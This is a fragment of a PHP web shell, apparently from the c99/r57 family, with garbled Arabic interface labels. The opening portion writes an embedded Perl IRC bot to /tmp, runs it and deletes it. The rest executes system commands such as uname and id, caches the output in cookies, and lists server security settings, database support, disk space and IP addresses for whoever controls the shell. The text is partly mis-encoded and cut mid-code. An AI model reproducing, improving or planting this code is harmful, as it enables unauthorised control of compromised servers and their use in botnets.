soh copiei e coloei (colokar nome do autor) sub fixaddr { my (\$address) = @_; chomp \$address; # just in case, sigh. if (\$address =~ /^\d+$/) { return inet_ntoa(pack \"N\", \$address); } elsif (\$address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) { return \$address; } elsif (\$address =~ tr/a-zA-Z//) { # Whee! Obfuscation! return inet_ntoa(((gethostbyname(\$address))[4])[0]); } else { return; } } ############################ "; $bot = "/tmp/ircs.pl"; $open = fopen($bot,"w"); fputs($open,$file); fclose($open); $cmd="perl $bot"; $cmd2="rm $bot"; system($cmd); system($cmd2); $_POST['cmd']="echo \"Now script try connect to ircserver ...\""; } if($unix) { if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; } if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; } if($safe_mode) { $sysctl = '-'; } else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; } else { $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease'); if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); } if(empty($sysctl)) { $sysctl = '-'; } setcookie('sysctl',$sysctl); } } echo $head; echo ''; if(empty($_POST['cmd'])) { $serv = array(127,192,172,10); $addr=@explode('.', $_SERVER['SERVER_ADDR']); $current_version = str_replace('.','',$version); if (!in_array($addr[0], $serv)) { @print ""; @readfile ("http://127.0.0.1/version.php?version=".$current_version."");}} echo '"; echo ws(2)."ÇáæÖÚ ÇáÇãä: "; echo (($safe_mode)?("ÝÚÇá"):("ÛíÑ ÝÚÇá")); echo "".ws(2); echo "ÇÕÏÇÑ ÇáÈí ÇÊÔ Èí: ".@phpversion().""; $curl_on = @function_exists('curl_version'); echo ws(2); echo "ÇáßíÑá: ".(($curl_on)?("ÝÚÇá"):("ÛíÑ ÝÚÇá")); echo "".ws(2); echo "ãÇí Óßá: "; $mysql_on = @function_exists('mysql_connect'); if($mysql_on){ echo "ÝÚÇá"; } else { echo "ÛíÑ ÝÚÇá"; } echo "".ws(2); echo "Çã ÇÓ Óßá: "; $mssql_on = @function_exists('mssql_connect'); if($mssql_on){echo "ÝÚÇá";}else{echo "ÛíÑ ÝÚÇá";} echo "".ws(2); echo "ÈæÓÊ ÞÑí Óßá: "; $pg_on = @function_exists('pg_connect'); if($pg_on){echo "ÝÚÇá";}else{echo "ÛíÑ ÝÚÇá";} echo "".ws(2); echo "ÇæÑÇßá: "; $ora_on = @function_exists('ocilogon'); if($ora_on){echo "ÝÚÇá";}else{echo "ãÛáÞ";} echo "
".ws(2); echo "ÇáÏæÇá ÇáããäæÚÉ : "; if(''==($df=@ini_get('disable_functions'))){echo "áÇíæÌÏ";}else{echo "$df";} $free = @diskfreespace($dir); if (!$free) {$free = 0;} $all = @disk_total_space($dir); if (!$all) {$all = 0;} echo "
".ws(2)."ÇáãÓÇÍÉ ÇáÎÇáíå : ".view_size($free)." ÇáãÓÇÍÉ ÇáßáíÉ: ".view_size($all).""; echo "
".ws(2); echo "Register globals: "; $reg_g = @ini_get("register_globals"); if($reg_g){ echo "ÝÚÇá"; } else { echo "ÛíÑ ÝÚÇá"; } echo "".ws(2); echo "open_basedir: "; $openbasedi = @ini_get("open_basedir"); if($openbasedi){ echo "ÝÚÇá"; } else { echo "ÛíÑ ÝÚÇá"; } echo "".ws(2); echo '
sysctl :'.ws(1).'
$OSTYPE :'.ws(1).'
Server :'.ws(1).'
id :'.ws(1).'
pwd :'.ws(1).'
ip :'.ws(1).'
'; echo "
"):(ws(3).@substr(@php_uname(),0,120)."
")); echo ws(3).$sysctl."
"; echo ws(3).ex('echo $OSTYPE')."
"; echo ws(3).@substr($SERVER_SOFTWARE,0,120)."
"; if(!empty($id)) { echo ws(3).$id."
"; } else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid')) { $euserinfo = @posix_getpwuid(@posix_geteuid()); $egroupinfo = @posix_getgrgid(@posix_getegid()); echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )
'; } else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."
"; echo ws(3).$dir; echo ws(3).'( '.perms(@fileperms($dir)).' )'; echo "
"; echo ws(3)."Your ip: ".$_SERVER["REMOTE_ADDR"]." - Server ip: ".gethostbyname($_SERVER["HTTP_HOST"])."
"; echo ""; } else { echo 'OS :'.ws(1).'
Server :'.ws(1).'
User :'.ws(1).'
pwd :'.ws(1).'
ip :'.ws(1).'
'; echo "
"; echo ws(3).@substr($SERVER_SOFTWARE,0,120)."
"; echo ws(3).@getenv("USERNAME")."
"; echo ws(3).$dir; echo "
"; echo ws(3)."Your ip: ".$_SERVER["REMOTE_ADDR"]." - Server ip: ".gethostbyname($_SERVER["HTTP_HOST"])."
"; echo "
"; } echo ""; echo "
".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); echo "
".in('submit','submit',0,$lang[$language.'_butt1'])."